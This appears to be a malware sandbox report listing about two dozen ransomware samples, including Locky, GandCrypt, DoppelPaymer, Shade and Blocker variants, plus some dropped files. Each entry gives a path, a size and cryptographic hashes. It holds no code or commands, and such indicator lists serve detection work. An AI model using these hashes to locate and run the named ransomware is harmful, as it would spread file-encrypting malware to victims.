C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
Filesize655KB
MD50148d418383e008780b98c30c719f6a4
SHA1c89e7a859fe0c65a79bdf13e028a179527b76075
SHA25617fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57
SHA5129502b0c79d9d4428c7b637a48c7cea649d6737c5196730e2c95f19409e68d08e20c3c80ab4b3463489e5ddf50f02c54c75936f10e4ddf5d0414d6bd2c0746f70
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe
Filesize683KB
MD577f23ed6c9c83823eb56ba579b4183d4
SHA174969b74766e2ee491f4f5ddd9f78b740e2107c9
SHA256ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73
SHA51256155c2312703f782037216317e9ba9f4025aded12da6c6b71974cce7b5f0c1c49b53e365875da8259b93fc9db8dcf5b7a73ed5ab10e52503cabdbc7bf6f39d9
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe
Filesize1.1MB
MD565e7e706a06bb299d22f9236f59f29e2
SHA1e08955a0fedadf6916d1adc164704ad42669d50d
SHA256d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f
SHA512ab288811d7ad23f85e232cec212ae1807734a1979e14f818c98e6330f0934601a6d565d87b5ccca1d7b3c41931d10e34886b4b08fd048d93fc4f61f84ec3e82c
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe
Filesize1.8MB
MD53ab50ae83ded33e1a825a4e4d680ce9a
SHA1b51471ce887ba813616d33fdf8366fb0c6b825bb
SHA256af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a
SHA512550aad01459074868618d46786419fd15cae090bd87a8a52e034da11e47aa0efe31955d114700cab8a8afd5277f48d4890b67b113e3c3f7d542c2400b16fa9ef
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe
Filesize2.5MB
MD51255eb3e81ec17d030da6884e0d3c724
SHA137c6026c74ca0df996a2ccd303f1dee6e73c46f2
SHA2569bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952
SHA5123017d6f3515d5ffdf7f8dfcbfe73ab8bbff2d2bce2a94fabbd76a7ff41d3f29ecd3b886c615e88ed8e43d48a54b473c9915c95c7d89388182d0f20ce14a59212
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe
Filesize5.0MB
MD561ec104d8a35a34d429a1a4f6e351957
SHA12d1e8636f787d34b2bf19391a862150d4793b7ac
SHA256985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5
SHA5128047a14c6243dde239d8afe6c236d9c1c03b28931c0667737110e7825c7187f669e1c838c9f367c1be54a539505e94095c5c14c5974606b9ddafa5bf8b50f81f
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe
Filesize428KB
MD55cd725ccdd4a940bc19c9bcd69768798
SHA1cb5c0c4ed17bc9dd83c85777ecb2f37ec060c50d
SHA25679b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1
SHA5123ac834a0b1e9d9693e5e598c8132d1e33594415be90ee6ba321144c4128bedbfefd0420926729d5e8469ee616ed986b03f8a1c822704ff9537fe17ce7cfa4605
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe
Filesize564KB
MD517a4b2ea4846a8ce82c950e66f714c7b
SHA1ce35d8296819fd28925427b55c374ec6b76d427d
SHA2567a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b
SHA5128cb2fd4061eec8e4dea1d4e5b8bf0dd24bfc2f4ae96cf9cbd7a5ebc93094bb460f6e60b040b5548d023f9faf4b4ac757a2a71c9ddd57b88344758a4acaff61d3
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe
Filesize5.7MB
MD5041ea50c950a58311a9c8f21e16a430d
SHA14f7cc5689a8600f488b6df7667248c8aae2c09f4
SHA256dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb
SHA512786240f18db197215eca42a1ecb54b9a12a3ce43f16580b32aaa3be5f2639fc9c97b7f2cedc5bbcb607ade8595577ab2f1823c4640973ff1dfc4003de285f0a8
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe
Filesize3.0MB
MD56fdb92acab9f8d0c8d2ce5a4b79f1476
SHA1a522d17d4a9a393b3badb4867151737d425f3e6b
SHA2569d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48
SHA512e350f2c5e2624f766c23c3f420f2135b312ccd0a20c54ab1c99a3faffb471f5e6d53e2fc39162e30689dfbf20d0214d93df4c22ca2db49c6467ea654025bb5ff
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe
Filesize790KB
MD596fcf96f2ba83e7e69bd2a03840ff61a
SHA123d51a51226ee7cdb84047e4faa178243e54684e
SHA25685a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6
SHA5127645af1cc1f0642565b8fb8088e27d1ed0445092c789020ed39e0f54e6f469b40298f792d4aa098a7a3a8e575fe1ff15c7704b67fb496b643abb67eb9cb9ada0
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe
Filesize579KB
MD5126ef6d06aa9d0b2cdf1969768bf8e77
SHA11114964a6d91bfee7adb3579236d5238ddade9af
SHA256265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b
SHA512e0c21254f0bc4bd4c1841a20c5d18db70d6c963312b2bf21b84736c2ba55fae78a6b9ad067ff1c9b3840e44c0c904ee5cf0da6065a3a1e433abd57010670f277
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
Filesize760KB
MD51d0bbda976be6bbda928de60554c6bca
SHA1b4ebabe04f6378d848e4005ca939b4590365e136
SHA2560a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a
SHA5122daac57d0c84c40feafcf8a61c634642027bdb6980a7ba1dd71bc078ab82a3bc488081ea8261489995e47059a844e6cd3c994d5b46a4d9e4107b146e4827c345
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
Filesize172KB
MD51e215c1f48fe39a18253563fb4977425
SHA13fc73258625934dd3d21465d334e8477bdd34c50
SHA2566f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79
SHA512784b75c60a11c8ce1444326dad93a97a5cb99d75d6599f6241167ef0a9d7031d3b065a4850455b96031b79ebf88cc96557b3861c44cd7327be61ba3895f6c4e1
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe
Filesize532KB
MD525a4c893ac72c93415beb7b354a063b7
SHA128136a600bdb2c04f96c4d23bc8512dfd0015b09
SHA25692c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d
SHA512264ea9c21594a4e4de9b1c57a4f2dd47d8d6255928aa17c38c7b4ea0100b3cb7d32b1ad3b58e3dba4a7cbee7165d1cee27c0806e371d7c17b9f635290aead046
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe
Filesize1.8MB
MD587dd6a06cba3e35bc4d3584a78e418ad
SHA1c9b25177db2f6eaddb4b028a9284b4fb5c3ffcd0
SHA25608a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb
SHA51270db262c8c9886f6608e95e775f9ab340bc1aefc15dbcccf2e751ee0d5ed0ef60f71f6de9ed9fd50c649ebd6c2c1cfe9b668c2522df5216855150b8c9c8779bf
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe
Filesize595KB
MD56157787670443a94e8bbd11177680b1d
SHA1dfe4f728957744678dbf9d7e43b15cf39f47fed2
SHA256a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8
SHA512c4f5e6d0b6c0403aece859a3ffd2af3f89221339fc13abf7c12e1010487528db8a2846d2c10387a562ec1932109755342f109d10e0eadb36fbc9f73bb1cb8066
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe
Filesize50KB
MD5564f8441b77b79e964def72f3b172ca6
SHA1753732b35513c0453185326735343dd267976ae7
SHA256724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3
SHA512c6473c83dc078bbabb894bb2f97cb99bf5ba07c9c51338f01e46ee71efedbda2601b4fa4908a00f289f88d3ce28665277cc4eeb131e057dbb3877130ae93e10b
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe
Filesize1.1MB
MD5d7b1976d623015332b2ff468f385ea69
SHA1d6155dacc2b2dbee8770bd911a83063e3a1c1a48
SHA2564d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce
SHA512ff44c8ce54a84c3f641593588f8d8f677074fb47d89a5b1656ff15ce59813cdbdb337345a10e609fe295750359d349e15cb245dbfc5b8f74b3bde9a15231a251
-
Filesize
1.8MB
MD519668fd339e893deea5260a83df9ba48
SHA10ac68638fc6c9f06f06b0b9c27f89a148116b893
SHA25691081d0638384d3bacd215a3d896a0a52bf4bb9a415668c961966260c06ef6e6
SHA51263f80e354eb8155f4b90ce3ed96a261dbd7f35176b8bce3a97724c5714a8bfd9d788c95c06330a02ab546b1ea97a9926644c586b6ae18ab0716494cc78805dab
-
Filesize
217B
MD50026bce84de75c563ae211295b58eb11
SHA12095ce0ec78ad242b5420be5833b01e45ccaea01
SHA25608fcd69172c95f916c6fdd5181abeedaf26fa29a43bf2e14507746a22c882952
SHA512b5e9ff531b6b91630549e87853676ebd4d4f080819ab4bb1b38e4ba65fef80f7a41eb2b19555829e25e19a8db1d894028c96e71901b0620c1d8297a87fae5d80
-
Filesize
209B
MD52a2905eb67363d3a3639654d49030817
SHA13c1a901d38943c4c90fa21eccff116345c935748
SHA25686c7bebd12e88c1ddf96fae64aed50c380ec4789765617518b5a02cc11942904
SHA512f3cb9c9a5939e7152f0a6419731f1ae57899bb7631e82988c1c99d8d8d3ee4c83a0338a32bad759ea20da336bcceaa60b45d3ebccc2f1e1810eb8e546e355b93
-
Filesize
12KB
MD5de61de242b5500304af17e4661100ea5
SHA1ed6c1fce0696ce100a93f2d3cea83a0475947e4f
SHA2563c373fde7222d1e3c5a13339d37f3b5752374210ae09974b4f17baa261c3b9a5
SHA512b393464bfd694bb314cf9c8f3d19ab6750cc65d9e3506c1b91a8658a227e9f8614b1f65b8eaa7b7e844d7308b450e690627e3eb1a8101ca80917c62233d1473f
-
Filesize
40KB
MD5e3460af5eeeafdd577ff4d5a121b7ba7
SHA17916bb31b7a1b9658cab0843de287a84bbd60e2a
SHA25623665d518566043f3b2320f74d5235ccce37c94a3dbf617f70261a4c28785320
SHA51222371d3e5ffc4ef309d33164ea527763c12813de94eaa817a303de0d827b3f88fe448030960832de6af488bec8999b0839b5e2e6a869c402c62e7888dffe51c5
-
Filesize
8KB
MD57cd78a175ca147e0de79dff3520c77dd
SHA12500560a9dbecd5f452747dd479b7f57a9a5e462
SHA2569a8fdb52498e05b493723645a85056978aa652eae0e8c49ade9f8c938bc3b14c
SHA512ea474b79dc623a8e3cda466d1b240f97f4cb96a037960619a1d7260b9d09b2bea5346e63c6e6ec0dff2277dc34df3ffc6bd41c3347f5f6ab12643723233338c1
-
\??\c:\users\admin\desktop\00424\trojan-ransom.win32.blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe
Filesize5.3MB
MD5d9f2ccd9aa993826bf2b0ee5849ea03e
SHA1e04fe9c81d8f7a6344d2a3047ffc68a2302c40b1
SHA2564138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4
SHA51292019108af6856195bba527f58dc9334429755196c5c66c2f975f6a0c4b86405d169df33a6216570e0bf2950360224cb48bc077d86bfcbece2531a8676e02e9c
-
Filesize
188B
MD5519d4fbb57f7028ef182b6868032d499
SHA1f11266c4a900c1d1b93ae2dfc4cf4449c6afd194
SHA2567e15669bec95c5b150a64f13776ed9789b66775a62521e216ef1ed6e959d4b99
SHA5128876fd17702844b99f5243ef9d5bb46c522c1fb3545c1de605fad473699a9a748a64bc864cbf140e7ffacd04b01af89f170de8f918c8570751ac2ac783e3cadf